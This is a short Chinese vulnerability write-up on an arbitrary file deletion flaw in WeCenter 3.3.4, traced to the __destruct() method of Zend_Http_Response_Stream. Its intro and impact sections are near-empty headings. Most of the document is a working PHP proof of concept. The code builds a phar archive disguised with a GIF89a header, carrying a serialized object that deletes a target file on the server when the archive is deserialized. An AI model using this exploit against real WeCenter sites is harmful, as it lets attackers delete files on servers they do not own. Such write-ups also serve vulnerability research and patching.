WeCenter 3.3.4 任意文件删除

一、漏洞简介

二、漏洞影响

WeCenter 3.3.4

三、复现过程

任意文件删除

system/Zend/Http/Response/Stream.php:__destruct() 方法中存在任意文件删除。

poc

<?php
class Zend_Http_Response_Stream
{
    protected $_cleanup;
    protected $stream_name;

    public function __construct($stream_name)
    {
        $this->_cleanup = true;
        $this->stream_name = $stream_name;
    }
}

$stream_name = '/var/www/html/wecenter334/shell.php';
$evilobj = new Zend_Http_Response_Stream($stream_name);
// phar.readonly无法通过该语句进行设置: init_set("phar.readonly",0);
$filename = 'poc.phar';// 后缀必须为phar，否则程序无法运行
file_exists($filename) ? unlink($filename) : null;
$phar=new Phar($filename);
$phar->startBuffering();
$phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($evilobj);
$phar->addFromString("foo.txt","bar");
$phar->stopBuffering();

?>